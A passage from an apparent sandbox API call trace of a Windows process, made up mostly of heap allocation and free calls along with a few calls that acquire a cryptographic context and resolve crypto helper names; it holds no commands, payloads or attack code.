hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0139.690] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0139.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0139.691] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0139.691] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0139.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69b88 [0139.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0139.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0139.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0139.692] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0139.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0139.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0139.692] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0139.692] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0139.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0139.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0139.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0139.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0139.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0139.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0139.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0139.693] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0139.693] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0139.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0139.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0139.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0139.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0139.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0139.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0139.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0139.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0139.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0139.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0139.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0139.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0139.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0139.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0139.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0139.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0139.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0139.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0139.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0139.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0139.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0139.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0139.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0139.697] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0139.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0139.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.697] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0139.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0139.697] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0139.697] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0139.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0139.698] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0139.698] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.698] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.698] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0139.698] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0139.698] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.698] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0139.698] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0139.698] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0139.698] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0139.698] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0139.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0139.699] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0139.699] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0139.699] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.699] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0139.699] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0139.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0139.700] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0139.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0139.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0139.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0139.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0139.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0139.744] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0139.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0139.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.744] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0139.744] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0139.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0139.744] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0139.744] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0139.744] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0139.745] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0139.745] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 